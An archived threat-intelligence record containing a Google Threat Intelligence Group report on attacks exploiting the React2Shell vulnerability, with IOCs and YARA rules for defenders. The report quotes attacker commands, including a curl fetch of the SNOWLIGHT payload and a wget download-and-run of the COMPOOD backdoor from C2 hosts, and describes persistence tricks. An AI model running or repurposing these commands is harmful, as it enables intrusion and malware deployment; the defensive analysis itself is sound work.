{
	"id": "2f2810ca-40d6-4658-b55a-479cba8f2c33",
	"created_at": "2026-04-06T00:21:02.164583Z",
	"updated_at": "2026-04-10T13:11:48.823198Z",
	"deleted_at": null,
	"sha1_hash": "8831939056d868d10d86da0d8dd9b37ee7518052",
	"title": "Multiple Threat Actors Exploit React2Shell (CVE-2025-55182)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 86656,
	"plain_text": "Multiple Threat Actors Exploit React2Shell (CVE-2025-55182)\r\nBy Google Threat Intelligence Group\r\nPublished: 2025-12-12 · Archived: 2026-04-05 13:04:35 UTC\r\nWritten by: Aragorn Tseng, Robert Weiner, Casey Charrier, Zander Work, Genevieve Stark, Austin Larsen\r\nIntroduction\r\nOn Dec. 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components,\r\ntracked as CVE-2025-55182 (aka \"React2Shell\"), was publicly disclosed. Shortly after disclosure, Google Threat\r\nIntelligence Group (GTIG) had begun observing widespread exploitation across many threat clusters, ranging from\r\nopportunistic cyber crime actors to suspected espionage groups.\r\nGTIG has identified distinct campaigns leveraging this vulnerability to deploy a MINOCAT tunneler, SNOWLIGHT\r\ndownloader, HISONIC backdoor, and COMPOOD backdoor, as well as XMRIG cryptocurrency miners, some of\r\nwhich overlaps with activity previously reported by Huntress. These observed campaigns highlight the risk posed to\r\norganizations using unpatched versions of React and Next.js. This post details the observed exploitation chains and\r\npost-compromise behaviors and provides intelligence to assist defenders in identifying and remediating this threat.\r\nFor information on how Google is protecting customers and mitigation guidance, please refer to our companion blog\r\npost, Responding to CVE-2025-55182: Secure your React and Next.js workloads.\r\nCVE-2025-55182 Overview\r\nCVE-2025-55182 is an unauthenticated RCE vulnerability in React Server Components with a CVSS v3.x score of\r\n10.0 and a CVSS v4 score of 9.3. The flaw allows unauthenticated attackers to send a single HTTP request that\r\nexecutes arbitrary code with the privileges of the user running the affected web server process.\r\nGTIG considers CVE-2025-55182 to be a critical-risk vulnerability. 
Due to the use of React Server Components\r\n(RSC) in popular frameworks like Next.js, there are a significant number of exposed systems vulnerable to this\r\nissue. Exploitation potential is further increased by two factors: 1) there are a variety of valid payload formats and\r\ntechniques, and 2) the mere presence of vulnerable packages on systems is often enough to permit exploitation.\r\nThe specific RSC packages that are vulnerable to CVE-2025-55182 are versions 19.0, 19.1.0, 19.1.1, and 19.2.0 of:\r\nreact-server-dom-webpack\r\nreact-server-dom-parcel\r\nreact-server-dom-turbopack\r\nA large number of non-functional exploits, and consequently false information regarding viable payloads and\r\nexploitation logic, were widely distributed about this vulnerability during the initial days after disclosure.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182\r\nPage 1 of 7\n\nAn example of a repository that started out wholly non-functional is one published by the GitHub user\r\n\"ejpir\", which, while initially claiming to be a legitimate functional exploit, has since updated its README to\r\nlabel the initial research claims as AI-generated and non-functional. While this repository still\r\ncontains non-functional exploit code, it also now contains legitimate exploit code with Unicode obfuscation. While\r\ninstances like this initially caused confusion across the industry, the number of legitimate exploits and their\r\ncapabilities have massively expanded, including in-memory Next.js web shell deployment capabilities. There are\r\nalso exploit samples, some entirely fake, some non-functional, and some with legitimate functionality, containing\r\nmalware targeting security researchers. 
Researchers should validate all exploit code before trusting its capabilities or\r\nlegitimacy.\r\nTechnical write-ups about this vulnerability have been published by reputable security firms, such as the one from\r\nWiz. Researchers should refer to such trusted publications for up-to-date and accurate information when validating\r\nvulnerability details, exploit code, or published detections.\r\nAdditionally, there was a separate CVE issued for Next.js (CVE-2025-66478); however, this CVE has since been\r\nmarked as a duplicate of CVE-2025-55182.\r\nObserved Exploitation Activity\r\nSince exploitation of CVE-2025-55182 began, GTIG has observed diverse payloads and post-exploitation behaviors\r\nacross multiple regions and industries. In this blog post we focus on China-nexus espionage and financially\r\nmotivated activity, but we have additionally observed Iran-nexus actors exploiting CVE-2025-55182.\r\nChina-Nexus Activity\r\nAs of Dec. 12, GTIG has identified multiple China-nexus threat clusters utilizing CVE-2025-55182 to compromise\r\nvictim networks globally. Amazon Web Services (AWS) reporting indicates that China-nexus threat groups Earth\r\nLamia and Jackpot Panda are also exploiting this vulnerability. GTIG tracks Earth Lamia as UNC5454. Currently,\r\nthere are no public indicators available to assess a group relationship for Jackpot Panda.\r\nMINOCAT\r\nGTIG observed China-nexus espionage cluster UNC6600 exploiting the vulnerability to deliver the MINOCAT\r\ntunneler. The threat actor retrieved and executed a bash script used to create a hidden directory ($HOME/.systemd-utils), kill any processes named \"ntpclient\", download a MINOCAT binary, and establish persistence by\r\ncreating a new cron job and a systemd service and by inserting malicious commands into the current user's shell\r\nconfig to execute MINOCAT whenever a new shell is started. 
MINOCAT is a 64-bit ELF executable for Linux that\r\nincludes a custom \"NSS\" wrapper and an embedded, open-source Fast Reverse Proxy (FRP) client that handles the\r\nactual tunneling.\r\nSNOWLIGHT\r\nIn separate incidents, suspected China-nexus threat actor UNC6586 exploited the vulnerability to execute a\r\ncommand using cURL or wget to retrieve a script that then downloaded and executed a SNOWLIGHT\r\ndownloader payload (7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a). SNOWLIGHT\r\nis a component of VSHELL, a publicly available multi-platform backdoor written in Go, which has been used by\r\nthreat actors of varying motivations. GTIG observed SNOWLIGHT making HTTP GET requests to C2\r\ninfrastructure (e.g., reactcdn.windowserrorapis[.]com) to retrieve additional payloads masquerading as legitimate\r\nfiles.\r\ncurl -fsSL -m180 reactcdn.windowserrorapis[.]com:443/?h=reactcdn.windowserrorapis[.]com\u0026p=443\u0026t=tcp\u0026a=l64\u0026stage=t\r\nFigure 1: cURL command executed to fetch SNOWLIGHT payload\r\nCOMPOOD\r\nGTIG also observed multiple incidents in which threat actor UNC6588 exploited CVE-2025-55182, then ran a script\r\nthat used wget to download a COMPOOD backdoor payload. The script then executed the COMPOOD sample,\r\nwhich masqueraded as Vim. GTIG did not observe any significant follow-on activity, and this threat actor's\r\nmotivations are currently unknown.\r\nwget http://45.76.155[.]14/vim -O /tmp/vim\r\n/tmp/vim \"/usr/lib/polkit-1/polkitd --no-debug\"\r\nFigure 2: COMPOOD downloaded via wget and executed\r\nCOMPOOD has historically been linked to suspected China-nexus espionage activity. 
In 2022, GTIG observed\r\nCOMPOOD in incidents involving a suspected China-nexus espionage actor, and we also observed samples\r\nuploaded to VirusTotal from Taiwan, Vietnam, and China.\r\nHISONIC\r\nAnother China-nexus actor, UNC6603, deployed an updated version of the HISONIC backdoor. HISONIC is a Go-based implant that utilizes legitimate cloud services, such as Cloudflare Pages and GitLab, to retrieve its encrypted\r\nconfiguration. This technique allows the actor to blend malicious traffic with legitimate network activity. In this\r\ninstance, the actor embedded an XOR-encoded configuration for the HISONIC backdoor delimited between two\r\nmarkers, \"115e1fc47977812\" to denote the start of the configuration and \"725166234cf88gxx\" to mark the end.\r\nTelemetry indicates this actor is targeting cloud infrastructure, specifically AWS and Alibaba Cloud instances, within\r\nthe Asia Pacific (APAC) region.\r\n\u003cversion\u003e115e1fc47977812.....REDACTED.....725166234cf88gxx\u003c/version\u003e\r\nFigure 3: HISONIC markers denoting configuration\r\nANGRYREBEL.LINUX\r\nFinally, we also observed a China-nexus actor, UNC6595, exploiting the vulnerability to deploy\r\nANGRYREBEL.LINUX. The threat actor uses an installation script (b.sh) that attempts to evade detection by\r\nmasquerading the malware as the legitimate OpenSSH daemon (sshd) within the /etc/ directory, rather than its\r\nstandard location. The actor also employs timestomping to alter file timestamps and executes anti-forensics\r\ncommands, such as clearing the shell history (history -c). 
Telemetry indicates this cluster is primarily targeting\r\ninfrastructure hosted on international Virtual Private Servers (VPS).\r\nFinancially Motivated Activity\r\nThreat actors that monetize access via cryptomining are often among the first to exploit newly disclosed\r\nvulnerabilities. GTIG observed multiple incidents, starting on Dec. 5, in which threat actors exploited CVE-2025-55182\r\nand deployed XMRig for illicit cryptocurrency mining. In one observed chain, the actor downloaded a shell\r\nscript named \"sex.sh,\" which downloads and executes the XMRIG cryptocurrency miner from GitHub. The script\r\nalso attempts to establish persistence for the miner via a new systemd service called \"system-update-service.\"\r\nGTIG has also observed numerous discussions regarding CVE-2025-55182 in underground forums, including\r\nthreads in which threat actors have shared links to scanning tools, proof-of-concept (PoC) code, and their\r\nexperiences using these tools.\r\nOutlook and Implications\r\nAfter the disclosure of high-visibility, critical vulnerabilities, it is common for affected products to undergo a period\r\nof increased scrutiny, resulting in a swift but temporary increase in the number of vulnerabilities discovered. Since\r\nthe disclosure of CVE-2025-55182, three additional React vulnerabilities have been disclosed: CVE-2025-55183,\r\nCVE-2025-55184, and CVE-2025-67779. In this case, two of these follow-on vulnerabilities have relatively limited\r\nimpacts (restricted information disclosure and causing a denial-of-service (DoS) condition). The third vulnerability\r\n(CVE-2025-67779) also causes a DoS condition, as it arose due to an incomplete patch for CVE-2025-55184.\r\nRecommendations\r\nOrganizations utilizing React or Next.js should take the following actions immediately:\r\n1. Patch Immediately:\r\n1. 
To prevent remote code execution due to CVE-2025-55182, patch vulnerable React Server\r\nComponents to at least 19.0.1, 19.1.2, or 19.2.1, depending on your vulnerable version. Patching to\r\n19.2.2 or 19.2.3 will also prevent the potential for remote code execution.\r\n2. To prevent the information disclosure impacts due to CVE-2025-55183, patch vulnerable React Server\r\nComponents to at least 19.2.2.\r\n3. To prevent DoS impacts due to CVE-2025-55184 and CVE-2025-67779, patch vulnerable React\r\nServer Components to 19.2.3. The 19.2.2 patch was found to be insufficient in preventing DoS\r\nimpacts.\r\n2. Deploy WAF Rules: Google has rolled out a Cloud Armor web application firewall (WAF) rule designed to\r\ndetect and block exploitation attempts related to this vulnerability. We recommend deploying this rule as a\r\ntemporary mitigation while your vulnerability management program patches and verifies all vulnerable\r\ninstances.\r\n3. Audit Dependencies: Determine if vulnerable React Server Components are included as a dependency in\r\nother applications within your environment.\r\n4. Monitor Network Traffic: Review logs for outbound connections to the indicators of compromise (IOCs)\r\nlisted below, particularly wget or cURL commands initiated by web server processes.\r\n5. Hunt for Compromise: Look for the creation of hidden directories like $HOME/.systemd-utils, the\r\nunauthorized termination of processes such as ntpclient, and the injection of malicious execution logic into\r\nshell configuration files like $HOME/.bashrc.\r\nIndicators of Compromise (IOCs)\r\nTo assist defenders in hunting for this activity, we have included IOCs for the threats described in this blog post. 
A broader subset of related indicators is available in a Google Threat Intelligence Collection of IOCs available for\r\nregistered users.\r\nIndicator | Type | Description\r\nreactcdn.windowserrorapis[.]com | Domain | SNOWLIGHT C2 and staging server\r\n82.163.22[.]139 | IP address | SNOWLIGHT C2 server\r\n216.158.232[.]43 | IP address | Staging server for sex.sh script\r\n45.76.155[.]14 | IP address | COMPOOD C2 and payload staging server\r\ndf3f20a961d29eed46636783b71589c183675510737c984a11f78932b177b540 | SHA256 | HISONIC sample\r\n92064e210b23cf5b94585d3722bf53373d54fb4114dca25c34e010d0c010edf3 | SHA256 | HISONIC sample\r\n0bc65a55a84d1b2e2a320d2b011186a14f9074d6d28ff9120cb24fcc03c3f696 | SHA256 | ANGRYREBEL.LINUX sample\r\n13675cca4674a8f9a8fabe4f9df4ae0ae9ef11986dd1dcc6a896912c7d527274 | SHA256 | XMRIG downloader script (filename: sex.sh)\r\n7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a | SHA256 | SNOWLIGHT sample (filename: linux_amd64)\r\n776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec530f4273 | SHA256 | MINOCAT sample\r\nYARA Rules\r\nMINOCAT\r\nrule G_APT_Tunneler_MINOCAT_1 {\r\n    meta:\r\n        author = \"Google Threat Intelligence Group (GTIG)\"\r\n        date_modified = \"2025-12-10\"\r\n        rev = \"1\"\r\n        md5 = \"533585eb6a8a4aad2ad09bbf272eb45b\"\r\n    strings:\r\n        $magic = { 7F 45 4C 46 }\r\n        $decrypt_func = { 48 85 F6 0F 94 C1 48 85 D2 0F 94 C0 08 C1 0F 85 }\r\n        $xor_func = { 4D 85 C0 53 49 89 D2 74 57 41 8B 18 48 85 FF 74 }\r\n        $frp_str1 = \"libxf-2.9.644/main.c\"\r\n        $frp_str2 = \"xfrp login response: run_id: [%s], version: [%s]\"\r\n        $frp_str3 = \"cannot found run ID, it should inited when login!\"\r\n        $frp_str4 = \"new work connection request run_id marshal failed!\"\r\n        $telnet_str1 = \"Starting telnetd on port %d\\n\"\r\n        $telnet_str2 = \"No login shell found at %s\\n\"\r\n        $key = \"bigeelaminoacow\"\r\n    condition:\r\n        $magic at 0 and (1 of ($decrypt_func, $xor_func)) and (2 of ($frp_str*)) and (1 of ($telnet_str*))\r\n}\r\nCOMPOOD\r\nrule G_Backdoor_COMPOOD_1 {\r\n    meta:\r\n        author = \"Google Threat Intelligence Group (GTIG)\"\r\n        date_modified = \"2025-12-11\"\r\n        rev = \"1\"\r\n        md5 = \"d3e7b234cf76286c425d987818da3304\"\r\n    strings:\r\n        $strings_1 = \"ShellLinux.Shell\"\r\n        $strings_2 = \"ShellLinux.Exec_shell\"\r\n        $strings_3 = \"ProcessLinux.sendBody\"\r\n        $strings_4 = \"ProcessLinux.ProcessTask\"\r\n        $strings_5 = \"socket5Quick.StopProxy\"\r\n        $strings_6 = \"httpAndTcp\"\r\n        $strings_7 = \"clean.readFile\"\r\n        $strings_8 = \"/sys/kernel/mm/transparent_hugepage/hpage_pmd_size\"\r\n        $strings_9 = \"/proc/self/auxv\"\r\n        $strings_10 = \"/dev/urandom\"\r\n        $strings_11 = \"client finished\"\r\n        $strings_12 = \"github.com/creack/pty.Start\"\r\n    condition:\r\n        uint32(0) == 0x464C457f and 8 of ($strings_*)\r\n}\r\nSNOWLIGHT\r\nrule G_Hunting_Downloader_SNOWLIGHT_1 {\r\n    meta:\r\n        author = \"Google Threat Intelligence Group (GTIG)\"\r\n        date_created = \"2025-03-25\"\r\n        date_modified = \"2025-03-25\"\r\n        md5 = \"3a7b89429f768fdd799ca40052205dd4\"\r\n        rev = 1\r\n    strings:\r\n        $str1 = \"rm -rf $v\"\r\n        $str2 = \"\u0026t=tcp\u0026a=\"\r\n        $str3 = \"\u0026stage=true\"\r\n        $str4 = \"export PATH=$PATH:$(pwd)\"\r\n        $str5 = \"curl\"\r\n        $str6 = \"wget\"\r\n        $str7 = \"python -c 'import urllib\"\r\n    condition:\r\n        all of them and filesize \u003c 5KB\r\n}\r\nPosted in Threat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182"
	],
	"report_names": [
		"threat-actors-exploit-react2shell-cve-2025-55182"
	],
	"threat_actors": [
		{
			"id": "2137e858-a11d-4b75-ae54-3267b096a4fc",
			"created_at": "2025-06-29T02:01:56.98797Z",
			"updated_at": "2026-04-10T02:00:04.667535Z",
			"deleted_at": null,
			"main_name": "Earth Lamia",
			"aliases": [],
			"source_name": "ETDA:Earth Lamia",
			"tools": [
				"BypassBoss",
				"PULSEPACK"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "650a9c54-160c-4a25-8e96-e845f2dd6f82",
			"created_at": "2026-01-18T02:00:03.063535Z",
			"updated_at": "2026-04-10T02:00:03.901997Z",
			"deleted_at": null,
			"main_name": "Earth Lamia",
			"aliases": [
				"UNC5454"
			],
			"source_name": "MISPGALAXY:Earth Lamia",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434862,
	"ts_updated_at": 1775826708,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8831939056d868d10d86da0d8dd9b37ee7518052.pdf",
		"text": "https://archive.orkl.eu/8831939056d868d10d86da0d8dd9b37ee7518052.txt",
		"img": "https://archive.orkl.eu/8831939056d868d10d86da0d8dd9b37ee7518052.jpg"
	}
}